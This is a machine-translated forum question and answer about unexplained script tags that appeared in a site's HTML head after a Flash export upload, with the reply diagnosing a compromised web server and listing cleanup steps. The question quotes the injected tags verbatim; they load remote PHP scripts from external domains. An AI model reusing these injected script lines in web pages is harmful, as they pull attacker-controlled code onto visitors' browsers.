有一位朋友正在使用Flash CS6编辑器在 export 命令中建议的所有 html包将 flash 文件上传到我的服务器。< / p>
好吧,尽管所有Flash讨论都是如此,但问题是最终一个非常奇怪的脚本引用出现在 head 元素中:
<!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://techmounting.com.au/KsEsFOFC.php" type="text/javascript"></script><!--/339810-->
此脚本引用不在原始 html 文件中..这闻起来有病毒,但我在整个google中找不到任何引用..我不知道是否是病毒在我朋友的电脑或我的服务器或什么。
有什么想法吗?
http://www.iu-jaen.es (不使用浏览器访问)
http://www.alliedcarehomehealth.com (不访问浏览器)
<script type="text/javascript">var gwloaded = false;</script>
<script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>
答案 0 :(得分:1)
您的网络服务器已遭到入侵。 TL; DR您的网站将向访问用户显示阻止插页式广告的内容,这将导致他们进行可疑的二进制下载。安全漏洞的原因尚不清楚,但我会采取正常的预防措施:重置相关密码,查找PHP / javascript文件上的可疑代码段。
Google还对您可以用来清理网站的一些步骤(更新第三方插件,更改PW等)进行了很好的概述:
https://support.google.com/webmasters/answer/163634
请参阅WebSense的此安全发布,以获取此攻击行为的摘要:
http://community.websense.com/blogs/securitylabs/archive/tags/Mass+Injection/default.aspx